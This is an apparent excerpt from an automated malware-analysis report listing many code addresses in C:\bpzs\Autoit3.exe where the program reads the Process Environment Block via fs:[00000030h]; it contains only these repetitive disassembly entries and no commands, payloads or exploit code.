            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043207F0 mov eax, dword ptr fs:[00000030h]6_3_043207F0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043207F0 mov eax, dword ptr fs:[00000030h]6_3_043207F0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D07F3 mov eax, dword ptr fs:[00000030h]6_3_042D07F3
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0433C7D0 mov eax, dword ptr fs:[00000030h]6_3_0433C7D0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0433C7D0 mov eax, dword ptr fs:[00000030h]6_3_0433C7D0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432F7D8 mov eax, dword ptr fs:[00000030h]6_3_0432F7D8
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042CB7C0 mov ebx, dword ptr fs:[00000030h]6_3_042CB7C0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042CB7C0 mov eax, dword ptr fs:[00000030h]6_3_042CB7C0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0433F020 mov eax, dword ptr fs:[00000030h]6_3_0433F020
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435E011 mov eax, dword ptr fs:[00000030h]6_3_0435E011
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042AB006 mov eax, dword ptr fs:[00000030h]6_3_042AB006
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042AB006 mov eax, dword ptr fs:[00000030h]6_3_042AB006
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042AC010 mov ecx, dword ptr fs:[00000030h]6_3_042AC010
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04324054 mov eax, dword ptr fs:[00000030h]6_3_04324054
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04324054 mov eax, dword ptr fs:[00000030h]6_3_04324054
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04324054 mov eax, dword ptr fs:[00000030h]6_3_04324054
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042B5054 mov eax, dword ptr fs:[00000030h]6_3_042B5054
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042DF0A0 mov eax, dword ptr fs:[00000030h]6_3_042DF0A0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042DF0A0 mov eax, dword ptr fs:[00000030h]6_3_042DF0A0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042DF0A0 mov eax, dword ptr fs:[00000030h]6_3_042DF0A0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04338090 mov eax, dword ptr fs:[00000030h]6_3_04338090
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435E092 mov eax, dword ptr fs:[00000030h]6_3_0435E092
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434909E mov edi, dword ptr fs:[00000030h]6_3_0434909E
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435C0F0 mov eax, dword ptr fs:[00000030h]6_3_0435C0F0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435C0F0 mov eax, dword ptr fs:[00000030h]6_3_0435C0F0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043540F0 mov eax, dword ptr fs:[00000030h]6_3_043540F0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043540F0 mov eax, dword ptr fs:[00000030h]6_3_043540F0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043730D2 mov eax, dword ptr fs:[00000030h]6_3_043730D2
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043730D2 mov eax, dword ptr fs:[00000030h]6_3_043730D2
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432511D mov eax, dword ptr fs:[00000030h]6_3_0432511D
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04330100 mov ecx, dword ptr fs:[00000030h]6_3_04330100
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04320144 mov eax, dword ptr fs:[00000030h]6_3_04320144
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04320144 mov eax, dword ptr fs:[00000030h]6_3_04320144
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043461B4 mov eax, dword ptr fs:[00000030h]6_3_043461B4
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043461B4 mov eax, dword ptr fs:[00000030h]6_3_043461B4
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043461B4 mov eax, dword ptr fs:[00000030h]6_3_043461B4
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043461B4 mov eax, dword ptr fs:[00000030h]6_3_043461B4
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043461B4 mov eax, dword ptr fs:[00000030h]6_3_043461B4
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043461B4 mov eax, dword ptr fs:[00000030h]6_3_043461B4
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043461B4 mov ecx, dword ptr fs:[00000030h]6_3_043461B4
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A21AC mov eax, dword ptr fs:[00000030h]6_3_042A21AC
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042C81A4 mov eax, dword ptr fs:[00000030h]6_3_042C81A4
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042C81A4 mov eax, dword ptr fs:[00000030h]6_3_042C81A4
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043761BE mov eax, dword ptr fs:[00000030h]6_3_043761BE
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432C193 mov eax, dword ptr fs:[00000030h]6_3_0432C193
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04338190 mov eax, dword ptr fs:[00000030h]6_3_04338190
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04338190 mov ecx, dword ptr fs:[00000030h]6_3_04338190
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04338190 mov eax, dword ptr fs:[00000030h]6_3_04338190
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04338190 mov eax, dword ptr fs:[00000030h]6_3_04338190
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04338190 mov eax, dword ptr fs:[00000030h]6_3_04338190
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04338190 mov eax, dword ptr fs:[00000030h]6_3_04338190
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434B188 mov ecx, dword ptr fs:[00000030h]6_3_0434B188
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435E18A mov eax, dword ptr fs:[00000030h]6_3_0435E18A
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436B222 mov eax, dword ptr fs:[00000030h]6_3_0436B222
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D6230 mov eax, dword ptr fs:[00000030h]6_3_042D6230
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042AF208 mov eax, dword ptr fs:[00000030h]6_3_042AF208
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435E211 mov eax, dword ptr fs:[00000030h]6_3_0435E211
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435A205 mov eax, dword ptr fs:[00000030h]6_3_0435A205
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435A205 mov ecx, dword ptr fs:[00000030h]6_3_0435A205
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435A205 mov eax, dword ptr fs:[00000030h]6_3_0435A205
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04361264 mov eax, dword ptr fs:[00000030h]6_3_04361264
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04361264 mov eax, dword ptr fs:[00000030h]6_3_04361264
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04361264 mov eax, dword ptr fs:[00000030h]6_3_04361264
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04361264 mov eax, dword ptr fs:[00000030h]6_3_04361264
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04323266 mov eax, dword ptr fs:[00000030h]6_3_04323266
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A8250 mov eax, dword ptr fs:[00000030h]6_3_042A8250
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043752A7 mov eax, dword ptr fs:[00000030h]6_3_043752A7
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0433E2A0 mov eax, dword ptr fs:[00000030h]6_3_0433E2A0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0433E2A0 mov eax, dword ptr fs:[00000030h]6_3_0433E2A0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04368292 mov eax, dword ptr fs:[00000030h]6_3_04368292
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042E0290 mov ecx, dword ptr fs:[00000030h]6_3_042E0290
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432B2E0 mov eax, dword ptr fs:[00000030h]6_3_0432B2E0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043672D6 mov eax, dword ptr fs:[00000030h]6_3_043672D6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043672D6 mov eax, dword ptr fs:[00000030h]6_3_043672D6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432C2D1 mov eax, dword ptr fs:[00000030h]6_3_0432C2D1
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042C02DC mov eax, dword ptr fs:[00000030h]6_3_042C02DC
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432F320 mov ecx, dword ptr fs:[00000030h]6_3_0432F320
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04375322 mov eax, dword ptr fs:[00000030h]6_3_04375322
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436B315 mov eax, dword ptr fs:[00000030h]6_3_0436B315
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436230F mov eax, dword ptr fs:[00000030h]6_3_0436230F
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436230F mov eax, dword ptr fs:[00000030h]6_3_0436230F
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436230F mov eax, dword ptr fs:[00000030h]6_3_0436230F
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436230F mov eax, dword ptr fs:[00000030h]6_3_0436230F
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]6_3_04325308
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]6_3_04325308
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]6_3_04325308
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]6_3_04325308
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]6_3_04325308
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]6_3_04325308
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]6_3_04325308
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]6_3_04325308
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]6_3_04325308
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]6_3_04325308
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]6_3_04325308
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]6_3_04325308
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]6_3_04325308
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]6_3_04325308
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]6_3_04325308
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D136D mov eax, dword ptr fs:[00000030h]6_3_042D136D
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04320370 mov ecx, dword ptr fs:[00000030h]6_3_04320370
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04320370 mov eax, dword ptr fs:[00000030h]6_3_04320370
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04320370 mov eax, dword ptr fs:[00000030h]6_3_04320370
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04320370 mov eax, dword ptr fs:[00000030h]6_3_04320370
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042B7370 mov eax, dword ptr fs:[00000030h]6_3_042B7370
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042B7370 mov eax, dword ptr fs:[00000030h]6_3_042B7370
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0433A354 mov eax, dword ptr fs:[00000030h]6_3_0433A354
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A1384 mov eax, dword ptr fs:[00000030h]6_3_042A1384
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A1384 mov eax, dword ptr fs:[00000030h]6_3_042A1384
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432B386 mov esi, dword ptr fs:[00000030h]6_3_0432B386
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432B386 mov eax, dword ptr fs:[00000030h]6_3_0432B386
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432B386 mov eax, dword ptr fs:[00000030h]6_3_0432B386
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432C387 mov eax, dword ptr fs:[00000030h]6_3_0432C387
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043383F0 mov eax, dword ptr fs:[00000030h]6_3_043383F0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042E23CD mov esi, dword ptr fs:[00000030h]6_3_042E23CD
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432E3CA mov eax, dword ptr fs:[00000030h]6_3_0432E3CA
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432E3CA mov eax, dword ptr fs:[00000030h]6_3_0432E3CA
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043733CB mov eax, dword ptr fs:[00000030h]6_3_043733CB
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043733CB mov eax, dword ptr fs:[00000030h]6_3_043733CB
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D23D0 mov eax, dword ptr fs:[00000030h]6_3_042D23D0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04332C25 mov eax, dword ptr fs:[00000030h]6_3_04332C25
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04332C25 mov eax, dword ptr fs:[00000030h]6_3_04332C25
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04332C25 mov eax, dword ptr fs:[00000030h]6_3_04332C25
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042ABC00 mov eax, dword ptr fs:[00000030h]6_3_042ABC00
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042ABC18 mov eax, dword ptr fs:[00000030h]6_3_042ABC18
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0433EC40 mov eax, dword ptr fs:[00000030h]6_3_0433EC40
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0433EC40 mov eax, dword ptr fs:[00000030h]6_3_0433EC40
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04359C40 mov ecx, dword ptr fs:[00000030h]6_3_04359C40
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D7C50 mov eax, dword ptr fs:[00000030h]6_3_042D7C50
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435DC4A mov eax, dword ptr fs:[00000030h]6_3_0435DC4A
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432BCB1 mov eax, dword ptr fs:[00000030h]6_3_0432BCB1
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432BCB1 mov eax, dword ptr fs:[00000030h]6_3_0432BCB1
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432BCB1 mov ecx, dword ptr fs:[00000030h]6_3_0432BCB1
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432BCB1 mov ecx, dword ptr fs:[00000030h]6_3_0432BCB1
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434ECA3 mov ecx, dword ptr fs:[00000030h]6_3_0434ECA3
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434ECA3 mov ecx, dword ptr fs:[00000030h]6_3_0434ECA3
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434ECA3 mov eax, dword ptr fs:[00000030h]6_3_0434ECA3
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434CCAB mov eax, dword ptr fs:[00000030h]6_3_0434CCAB
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434CCAB mov eax, dword ptr fs:[00000030h]6_3_0434CCAB
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434CCAB mov eax, dword ptr fs:[00000030h]6_3_0434CCAB
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434CCAB mov eax, dword ptr fs:[00000030h]6_3_0434CCAB
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04358C90 mov eax, dword ptr fs:[00000030h]6_3_04358C90
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04358C90 mov eax, dword ptr fs:[00000030h]6_3_04358C90
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D2C80 mov eax, dword ptr fs:[00000030h]6_3_042D2C80
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A4CD0 mov eax, dword ptr fs:[00000030h]6_3_042A4CD0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04320D10 mov eax, dword ptr fs:[00000030h]6_3_04320D10
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04320D10 mov ecx, dword ptr fs:[00000030h]6_3_04320D10
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04338D10 mov eax, dword ptr fs:[00000030h]6_3_04338D10
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04338D10 mov eax, dword ptr fs:[00000030h]6_3_04338D10
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D6D0B mov eax, dword ptr fs:[00000030h]6_3_042D6D0B
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432BD00 mov eax, dword ptr fs:[00000030h]6_3_0432BD00
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432BD00 mov eax, dword ptr fs:[00000030h]6_3_0432BD00
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432BD00 mov eax, dword ptr fs:[00000030h]6_3_0432BD00
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0433ED00 mov eax, dword ptr fs:[00000030h]6_3_0433ED00
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04332D75 mov eax, dword ptr fs:[00000030h]6_3_04332D75
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04332D75 mov eax, dword ptr fs:[00000030h]6_3_04332D75
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434FD7D mov eax, dword ptr fs:[00000030h]6_3_0434FD7D
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434FD7D mov eax, dword ptr fs:[00000030h]6_3_0434FD7D
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434FD7D mov ecx, dword ptr fs:[00000030h]6_3_0434FD7D
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434FD7D mov eax, dword ptr fs:[00000030h]6_3_0434FD7D
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D5D60 mov eax, dword ptr fs:[00000030h]6_3_042D5D60
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432FD60 mov eax, dword ptr fs:[00000030h]6_3_0432FD60
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432FD60 mov eax, dword ptr fs:[00000030h]6_3_0432FD60
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432FD60 mov eax, dword ptr fs:[00000030h]6_3_0432FD60
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0429DD40 mov eax, dword ptr fs:[00000030h]6_3_0429DD40
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435DDBB mov eax, dword ptr fs:[00000030h]6_3_0435DDBB
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04359DA1 mov eax, dword ptr fs:[00000030h]6_3_04359DA1
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04371D92 mov eax, dword ptr fs:[00000030h]6_3_04371D92
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042E0D90 mov eax, dword ptr fs:[00000030h]6_3_042E0D90
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04326DF7 mov eax, dword ptr fs:[00000030h]6_3_04326DF7
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436ADF9 mov eax, dword ptr fs:[00000030h]6_3_0436ADF9
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042DADC8 mov eax, dword ptr fs:[00000030h]6_3_042DADC8
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A3DDA mov eax, dword ptr fs:[00000030h]6_3_042A3DDA
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A3DDA mov eax, dword ptr fs:[00000030h]6_3_042A3DDA
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A3DDA mov eax, dword ptr fs:[00000030h]6_3_042A3DDA
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A3DDA mov eax, dword ptr fs:[00000030h]6_3_042A3DDA
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A5DD5 mov ecx, dword ptr fs:[00000030h]6_3_042A5DD5
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04326E20 mov ecx, dword ptr fs:[00000030h]6_3_04326E20
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042C8E37 mov eax, dword ptr fs:[00000030h]6_3_042C8E37
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042C8E37 mov eax, dword ptr fs:[00000030h]6_3_042C8E37
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A7E00 mov eax, dword ptr fs:[00000030h]6_3_042A7E00
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A7E00 mov eax, dword ptr fs:[00000030h]6_3_042A7E00
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D5E03 mov eax, dword ptr fs:[00000030h]6_3_042D5E03
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D5E03 mov eax, dword ptr fs:[00000030h]6_3_042D5E03
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0431FE00 mov eax, dword ptr fs:[00000030h]6_3_0431FE00
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04328E00 mov eax, dword ptr fs:[00000030h]6_3_04328E00
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04337E00 mov eax, dword ptr fs:[00000030h]6_3_04337E00
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04337E00 mov eax, dword ptr fs:[00000030h]6_3_04337E00
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04337E00 mov eax, dword ptr fs:[00000030h]6_3_04337E00
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04337E00 mov ecx, dword ptr fs:[00000030h]6_3_04337E00
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04328E70 mov eax, dword ptr fs:[00000030h]6_3_04328E70
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04328E70 mov eax, dword ptr fs:[00000030h]6_3_04328E70
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04328E70 mov eax, dword ptr fs:[00000030h]6_3_04328E70
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04328E70 mov eax, dword ptr fs:[00000030h]6_3_04328E70
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04328E70 mov eax, dword ptr fs:[00000030h]6_3_04328E70
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04328E70 mov eax, dword ptr fs:[00000030h]6_3_04328E70
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04328E70 mov eax, dword ptr fs:[00000030h]6_3_04328E70
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04329E60 mov eax, dword ptr fs:[00000030h]6_3_04329E60
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04347E6C mov eax, dword ptr fs:[00000030h]6_3_04347E6C
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436CE6C mov eax, dword ptr fs:[00000030h]6_3_0436CE6C
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436CE6C mov eax, dword ptr fs:[00000030h]6_3_0436CE6C
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04367E41 mov eax, dword ptr fs:[00000030h]6_3_04367E41
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04367E41 mov eax, dword ptr fs:[00000030h]6_3_04367E41
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04367E41 mov eax, dword ptr fs:[00000030h]6_3_04367E41
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04367E41 mov eax, dword ptr fs:[00000030h]6_3_04367E41
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0429FE51 mov eax, dword ptr fs:[00000030h]6_3_0429FE51
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04373EB7 mov eax, dword ptr fs:[00000030h]6_3_04373EB7
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432CEB0 mov eax, dword ptr fs:[00000030h]6_3_0432CEB0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04358E9E mov eax, dword ptr fs:[00000030h]6_3_04358E9E
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04344E85 mov eax, dword ptr fs:[00000030h]6_3_04344E85
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04344E85 mov eax, dword ptr fs:[00000030h]6_3_04344E85
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04344E85 mov eax, dword ptr fs:[00000030h]6_3_04344E85
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04344E85 mov eax, dword ptr fs:[00000030h]6_3_04344E85
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04344E85 mov eax, dword ptr fs:[00000030h]6_3_04344E85
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04358EE2 mov eax, dword ptr fs:[00000030h]6_3_04358EE2
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435DEC8 mov eax, dword ptr fs:[00000030h]6_3_0435DEC8
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435BF34 mov eax, dword ptr fs:[00000030h]6_3_0435BF34
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432FF30 mov eax, dword ptr fs:[00000030h]6_3_0432FF30
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432FF30 mov eax, dword ptr fs:[00000030h]6_3_0432FF30
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04346F30 mov eax, dword ptr fs:[00000030h]6_3_04346F30
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04346F30 mov eax, dword ptr fs:[00000030h]6_3_04346F30
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04346F30 mov eax, dword ptr fs:[00000030h]6_3_04346F30
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04346F30 mov eax, dword ptr fs:[00000030h]6_3_04346F30
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04346F30 mov eax, dword ptr fs:[00000030h]6_3_04346F30
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04346F30 mov eax, dword ptr fs:[00000030h]6_3_04346F30
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04346F30 mov eax, dword ptr fs:[00000030h]6_3_04346F30
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042B3F2D mov eax, dword ptr fs:[00000030h]6_3_042B3F2D
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04332F12 mov eax, dword ptr fs:[00000030h]6_3_04332F12
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A4F60 mov eax, dword ptr fs:[00000030h]6_3_042A4F60
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04320F67 mov eax, dword ptr fs:[00000030h]6_3_04320F67
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04345F5B mov eax, dword ptr fs:[00000030h]6_3_04345F5B
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04345F5B mov eax, dword ptr fs:[00000030h]6_3_04345F5B
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042B3FA2 mov eax, dword ptr fs:[00000030h]6_3_042B3FA2
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042CDFA0 mov ecx, dword ptr fs:[00000030h]6_3_042CDFA0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0433CF80 mov eax, dword ptr fs:[00000030h]6_3_0433CF80
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0433CF80 mov eax, dword ptr fs:[00000030h]6_3_0433CF80
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435BFF0 mov eax, dword ptr fs:[00000030h]6_3_0435BFF0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435BFF0 mov eax, dword ptr fs:[00000030h]6_3_0435BFF0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04342FC0 mov eax, dword ptr fs:[00000030h]6_3_04342FC0
